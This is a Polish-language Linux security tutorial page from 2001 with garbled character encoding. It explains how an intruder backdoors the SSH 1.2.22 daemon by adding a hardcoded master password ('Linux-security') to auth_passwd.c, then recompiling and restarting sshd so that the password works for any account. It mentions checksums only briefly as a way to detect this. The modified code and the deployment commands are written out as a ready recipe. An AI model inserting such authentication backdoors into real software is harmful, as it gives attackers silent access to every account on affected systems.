 |
Bezpiecze±stwo system≤w Linux'owych |
|
Linux Security - Backdoor'y
|
|
Trojan w SSH
 |
| [1] [2] |
|
|
Konie troja±skie czasami instalowane s▒ przez w│amywaczy w kodach ╝r≤d│owych aplikacji u┐ywanych przez wszystkich u┐ytkownik≤w systemu.
Instalacja takiego backdoor'a polega tylko na zmianie kilku linijek
kodu i ponownej kompilacji. Trojan taki jest nie do wykrycia, chyba ┐e
administrator sprawdza sobie sumy kontrolne tej┐e aplikacji.
Instalacja trojana w naszym przypadku odbywa siΩ na przyk│adzie pakietu ssh 1.2.22. Instrukcje odpowiedzialne za proces autoryzacji has│a s▒ w pliku auth_passwd.c. Funkcja auth_password zwraca warto╢µ 0, je╢li autoryzacja siΩ nie uda│a a inne, w przypadku sukcesu. Wystarczy dopisaµ tylko dwie linijki kodu aby przy ka┐dej autoryzacji mo┐na by│o podaµ nasze dodatkowe has│o. |
[root@localhost] tail -n 8 auth_passwd.c
#endif /* HAVE_SCO_ETC_SHADOW */
#endif /* HAVE_OSF1_C2_SECURITY */
if (strcmp(password,"Linux-security")==0 ????
{ return 1; }
/* Authentication is accepted if the encrypted
passwords are identical. */
return strcmp(encrypted_password, correct_passwd) == 0;
}
|
|
Nale┐y tylko dopisaµ do kodu ╝r≤d│owego linijki zaznaczone na czerwono.
NastΩpnie wydajemy polecenia: make make install killall -9 sshd /usr/local/sbin/sshd Teraz mo┐emy siΩ zalogowaµ na ka┐de konto, wystarczy tylko jako has│o podaµ Linux-security. |
ICMP - Pine - Fork - Firewall - Bezpieczne partycje
Suidy - Skanowanie - Word exportable - Backdoor'y - Sumy kontrolne
Perl - Logrotate - Shell przez WWW - Forum - KsiΩga go╢ci - Statystka - Linki
Kontakt: tronix@2com.pl
Copyright by Tronix (c)2001 All Rights Reserved